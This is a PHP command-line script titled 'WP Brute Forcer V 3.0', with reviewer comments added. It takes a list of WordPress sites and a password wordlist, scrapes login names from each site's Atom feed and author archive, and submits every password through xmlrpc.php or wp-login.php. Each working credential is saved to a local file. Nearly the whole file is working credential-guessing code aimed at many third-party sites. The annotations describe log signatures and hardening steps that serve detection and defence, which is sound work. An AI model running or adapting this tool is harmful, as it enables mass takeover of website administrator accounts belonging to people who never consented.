- <?
// Review note: command-line front end of a WordPress password-guessing script.
// It prompts on STDIN for two file paths (a list of sites and a password wordlist) and reads both files whole.
- error_reporting(0); // hides every PHP error and warning from the operator
- set_time_limit(0); // no execution time limit
- ini_set('memory_limit', '640000M'); // very large memory ceiling for the two lists loaded below
- echo"
- [#]=============================[#]
- [#] WP Brute Forcer V 3.0 [#]
- [#] Nani17 - fb.com/root.sy3 [#]
- [#] MaDe By Islam [#]
- [#] Last Update : 26/9/2014 [#]
- [#]=============================[#]
- ";
- //$f1 = fopen("coki.txt","w");
- //fclose($f1);
- echo"\n(Enter Sites List) => ";
- $sites = trim(fgets(STDIN,1024)); // path of the sites file, as typed by the operator
- $k2=trim(@file_get_contents($sites)); // @ suppresses the warning if the file cannot be read
- $list2=@explode("\n",$k2); // one site per line
- $count2 =count($list2);
- echo"(Enter wordlist) => ";
- $wl = trim(fgets(STDIN,1024)); // path of the password wordlist
- $k=trim(@file_get_contents($wl));
- $list=@explode("\n",$k); // one candidate password per line
- $count =@count($list);
- if($k){ // the guard tests only the wordlist contents ($k), not the sites list
- echo"\n[*] $count2 site and $count password loaded \n";
- echo"\n[*] Cracking ... \n\n";
- }else{
- echo "[*] no file found \n";
- exit();
- }
// brute($list2, $list): for every site in $list2, submits every password in $list to that site's WordPress login. Returns nothing.
// Request sequence visible below, usable as a detection signature in web-server logs:
//   1. GET /wp-trackback.php - the site is processed further only if the body matches /need/i
//   2. GET /?feed=atom and GET /?author=1 - a candidate login name is scraped from <name> or from the page <title>
//   3. a get_headers() request and a probe POST to /xmlrpc.php (wp.getUsersBlogs with the fixed pair adminnnn/adminnnn)
//   4. one POST per password to /xmlrpc.php (wp.getUsersBlogs) or, when step 3 does not qualify, to /wp-login.php
// Every curl handle that sets CURLOPT_USERAGENT sends "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)";
// the /wp-login.php handles set no CURLOPT_USERAGENT. Hits are appended to jh.txt in the working directory.
// Defensive takeaways: throttle or lock out repeated failed logins on both /xmlrpc.php and /wp-login.php,
// disable XML-RPC where it is not needed, avoid exposing login names through feeds and author archives,
// and require strong passwords or a second factor for administrator accounts.
- function brute($list2,$list){
- foreach($list2 as $site){ // outer loop: one pass per site
- $site = trim($site);
- $gets = $site."/wp-trackback.php"; // step 1: fingerprint request
- $ch2 = curl_init();
- curl_setopt($ch2, CURLOPT_URL, $gets);
- curl_setopt($ch2, CURLOPT_HEADER, 0);
- curl_setopt($ch2,CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch2,CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch2, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
- $result2 = curl_exec($ch2);
- curl_exec($ch2); // the same request is sent a second time and its result discarded
- curl_close($ch2);
- if(preg_match("/need/i",$result2)){ // presumably matches WordPress's trackback error text - confirm
- $user = $site."/?feed=atom"; // step 2a: Atom feed, scraped for the first <name> element
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $user);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch,CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
- $result = curl_exec($ch);
- curl_exec($ch); // duplicate request, result discarded
- curl_close($ch);
- preg_match('#<name>(.*?)</name>#', $result, $username);
- $user1 = $site."/?author=1"; // step 2b: author archive for user id 1
- $ch1 = curl_init();
- curl_setopt($ch1, CURLOPT_URL, $user1);
- curl_setopt($ch1, CURLOPT_HEADER, 0);
- curl_setopt($ch1,CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch1,CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch1, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
- $result1 = curl_exec($ch1);
- curl_exec($ch1); // duplicate request, result discarded
- curl_close($ch1);
- preg_match('#<title>(.*?)</title>#', $result1, $username1);
- $account = explode(' |', $username1[1]); // text before " |" in the <title> is kept as the fallback login name
- $check = @get_headers($site."/xmlrpc.php"); // extra request to /xmlrpc.php, used only for its status line
- $uz = $site."/wp-admin/"; // sent as redirect_to in the /wp-login.php POSTs further down
- $method1 = strlen($username[1]); // byte length of the name taken from the feed
- $method2 = strlen($account[0]); // byte length of the name taken from the author page title
- $dataz = "
- <methodCall>
- <methodName>wp.getUsersBlogs</methodName>
- <params>
- <param><value><string>adminnnn</string></value></param>
- <param><value><string>adminnnn</string></value></param>
- </params></methodCall>
- "; // probe call with a fixed login pair; only the response format is inspected below
- $curlz = curl_init();
- curl_setopt($curlz,CURLOPT_URL, $site."/xmlrpc.php");
- curl_setopt($curlz,CURLOPT_USERAGENT,'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');
- curl_setopt($curlz,CURLOPT_HTTPHEADER,$headers);
- curl_setopt($curlz,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($curlz,CURLOPT_FOLLOWLOCATION,1);
- curl_setopt($curlz,CURLOPT_TIMEOUT,10);
- curl_setopt($curlz,CURLOPT_CONNECTTIMEOUT,10);
- curl_setopt($curlz,CURLOPT_COOKIEJAR, getcwd()."./wp-cookie.txt");
- curl_setopt($curlz,CURLOPT_COOKIEFILE, getcwd()."./wp-cookie.txt");
- curl_setopt($curlz,CURLOPT_POSTFIELDS, $dataz);
- $resultz = curl_exec($curlz);
- curl_close($curlz);
- if(eregi("200",$check[0]) && !eregi("<string>parse error. not well formed</string>" , $resultz)){ // XML-RPC path: status line contains 200 and the probe did not return the "parse error" fault
- if(isset($username[1]) && $method1 > 0 && $method1 <= 15){ // branch 1: login name from the feed, 1 to 15 bytes long
- foreach($list as $pass){ // one XML-RPC request per wordlist entry
- $pass = trim($pass);
- $headers = array('Content-Type: application/x-www-form-urlencoded');
- $isadmin = '<name>isAdmin</name>';
- #############################
- ## TESTING EACH PASSWORD ##
- #############################
- $data = "
- <methodCall>
- <methodName>wp.getUsersBlogs</methodName>
- <params>
- <param><value><string>$username[1]</string></value></param>
- <param><value><string>$pass</string></value></param>
- </params></methodCall>
- ";
- $curl = curl_init();
- curl_setopt($curl,CURLOPT_URL, $site."/xmlrpc.php");
- curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');
- curl_setopt($curl,CURLOPT_HTTPHEADER,$headers);
- curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
- curl_setopt($curl,CURLOPT_TIMEOUT,10);
- curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,10);
- curl_setopt($curl,CURLOPT_COOKIEJAR, getcwd()."./wp-cookie.txt");
- curl_setopt($curl,CURLOPT_COOKIEFILE, getcwd()."./wp-cookie.txt");
- curl_setopt($curl,CURLOPT_POSTFIELDS, $data);
- $result = curl_exec($curl);
- curl_close($curl);
- ##########################
- ## CHECK IF IT WORKED ##
- ##########################
- if(strstr($result, $isadmin)){ // success heuristic: the response contains the isAdmin member
- echo"[+] Password is : $pass\n";
- $fo = fopen("jh.txt","a+"); // hits are appended to jh.txt in the working directory
- fwrite($fo,"[+] $site/wp-admin\n $username[1]:$pass\n\n");
- fclose($fo);
- break;
- }
- else{
- echo "[-] $site : ($username[1]:$pass) -> error\n";
- }}}
- elseif($method1 == 0 && isset($account[0]) && $method2 <= 15){ // branch 2: no name from the feed, use the one from the author page title
- foreach($list as $pass){
- $headers = array('Content-Type: application/x-www-form-urlencoded');
- $isadmin = '<name>isAdmin</name>';
- #############################
- ## TESTING EACH PASSWORD ##
- #############################
- $data = "
- <methodCall>
- <methodName>wp.getUsersBlogs</methodName>
- <params>
- <param><value><string>$account[0]</string></value></param>
- <param><value><string>$pass</string></value></param>
- </params></methodCall>
- ";
- $curl = curl_init();
- curl_setopt($curl,CURLOPT_URL, $site."/xmlrpc.php");
- curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');
- curl_setopt($curl,CURLOPT_HTTPHEADER,$headers);
- curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
- curl_setopt($curl,CURLOPT_TIMEOUT,10);
- curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,10);
- curl_setopt($curl,CURLOPT_COOKIEJAR, getcwd()."./wp-cookie.txt");
- curl_setopt($curl,CURLOPT_COOKIEFILE, getcwd()."./wp-cookie.txt");
- curl_setopt($curl,CURLOPT_POSTFIELDS, $data);
- $result = curl_exec($curl);
- curl_close($curl);
- ##########################
- ## CHECK IF IT WORKED ##
- ##########################
- if(strstr($result, $isadmin)){
- echo"[+] Password is : $pass\n";
- $fo = fopen("jh.txt","a+");
- fwrite($fo,"[+] $site/wp-admin\n $account[0]:$pass\n\n");
- fclose($fo);
- break;
- }
- else{
- echo "[-] $site : ($account[0]:$pass) -> error\n";
- }}}
- else{ // branch 3: neither scraped name qualifies, so the literal login "admin" is used
- $admin = "admin";
- foreach($list as $pass){
- $pass = trim($pass);
- $headers = array('Content-Type: application/x-www-form-urlencoded');
- $isadmin = '<name>isAdmin</name>';
- #############################
- ## TESTING EACH PASSWORD ##
- #############################
- $data = "
- <methodCall>
- <methodName>wp.getUsersBlogs</methodName>
- <params>
- <param><value><string>$admin</string></value></param>
- <param><value><string>$pass</string></value></param>
- </params></methodCall>
- ";
- $curl = curl_init();
- curl_setopt($curl,CURLOPT_URL, $site."/xmlrpc.php");
- curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');
- curl_setopt($curl,CURLOPT_HTTPHEADER,$headers);
- curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
- curl_setopt($curl,CURLOPT_TIMEOUT,10);
- curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,10);
- curl_setopt($curl,CURLOPT_COOKIEJAR, getcwd()."./wp-cookie.txt");
- curl_setopt($curl,CURLOPT_COOKIEFILE, getcwd()."./wp-cookie.txt");
- curl_setopt($curl,CURLOPT_POSTFIELDS, $data);
- $result = curl_exec($curl);
- curl_close($curl);
- ##########################
- ## CHECK IF IT WORKED ##
- ##########################
- if(strstr($result, $isadmin)){
- echo"[+] Password is : $pass\n";
- $fo = fopen("jh.txt","a+");
- fwrite($fo,"[+] $site/wp-admin\n $admin:$pass\n\n");
- fclose($fo);
- break;
- }
- else{
- echo "[-] $site : ($admin:$pass) -> error\n";
- }
- }}
- }
- else{ // form-login path: the same three branches, sent to /wp-login.php instead of /xmlrpc.php
- if(isset($username[1]) && $method1 > 0 && $method1 <= 15){
- foreach($list as $pass){
- $pass = trim($pass);
- $ch = curl_init();
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch,CURLOPT_URL,$site.'/wp-login.php');
- curl_setopt($ch,CURLOPT_COOKIEJAR,"coki.txt");
- curl_setopt($ch,CURLOPT_COOKIEFILE,"coki.txt");
- curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
- curl_setopt($ch,CURLOPT_POST,TRUE);
- curl_setopt($ch,CURLOPT_POSTFIELDS,"log=".$username[1]."&pwd=".$pass."&wp-submit=Giri"."&redirect_to=".$uz."&testcookie=1"); // the fixed fields wp-submit=Giri and testcookie=1 form a recognisable request pattern
- $exec = curl_exec($ch);
- curl_close($ch);
- if(preg_match("/profile.php/",$exec)){ // success heuristic: the returned page mentions profile.php
- echo"[+] Password is : $pass\n";
- $fo = fopen("jh.txt","a+");
- fwrite($fo,"[+] $site/wp-admin\n $username[1]:$pass\n\n");
- fclose($fo);
- break;
- }
- else{
- echo "[-] $site : ($username[1]:$pass) -> error\n";
- }
- }}
- elseif($method1 == 0 && isset($account[0]) && $method2 <= 15){
- foreach($list as $pass){
- $pass = trim($pass);
- $ch = curl_init();
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch,CURLOPT_URL,$site.'/wp-login.php');
- curl_setopt($ch,CURLOPT_COOKIEJAR,"coki.txt");
- curl_setopt($ch,CURLOPT_COOKIEFILE,"coki.txt");
- curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
- curl_setopt($ch,CURLOPT_POST,TRUE);
- curl_setopt($ch,CURLOPT_POSTFIELDS,"log=".$account[0]."&pwd=".$pass."&wp-submit=Giri"."&redirect_to=".$uz."&testcookie=1");
- $exec = curl_exec($ch);
- curl_close($ch);
- if(preg_match("/profile.php/",$exec)){
- echo"[+] Password is : $pass\n";
- $fo = fopen("jh.txt","a+");
- fwrite($fo,"[+] $site/wp-admin\n $account[0]:$pass\n\n");
- fclose($fo);
- break;
- }
- else{
- echo "[-] $site : ($account[0]:$pass) -> error\n";
- }}}
- else{
- foreach($list as $pass){
- $pass = trim($pass);
- $ch = curl_init();
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch,CURLOPT_URL,$site.'/wp-login.php');
- curl_setopt($ch,CURLOPT_COOKIEJAR,"coki.txt");
- curl_setopt($ch,CURLOPT_COOKIEFILE,"coki.txt");
- curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
- curl_setopt($ch,CURLOPT_POST,TRUE);
- curl_setopt($ch,CURLOPT_POSTFIELDS,"log=admin&pwd=".$pass."&wp-submit=Giri"."&redirect_to=".$uz."&testcookie=1");
- $exec = curl_exec($ch);
- curl_close($ch);
- if(preg_match("/profile.php/",$exec)){
- echo"[+] Password is : $pass\n";
- $fo = fopen("jh.txt","a+");
- fwrite($fo,"[+] $site/wp-admin\n admin:$pass\n\n");
- fclose($fo);
- break;
- }
- else{
- echo "[-] $site : (admin:$pass) -> error\n";
- }
- }}}
- }}}
- brute($list2,$list); // single entry point: passes the loaded site list and password list to brute(); the two loops inside contain no delay, so the resulting traffic is a rapid burst of login requests per site
- ?>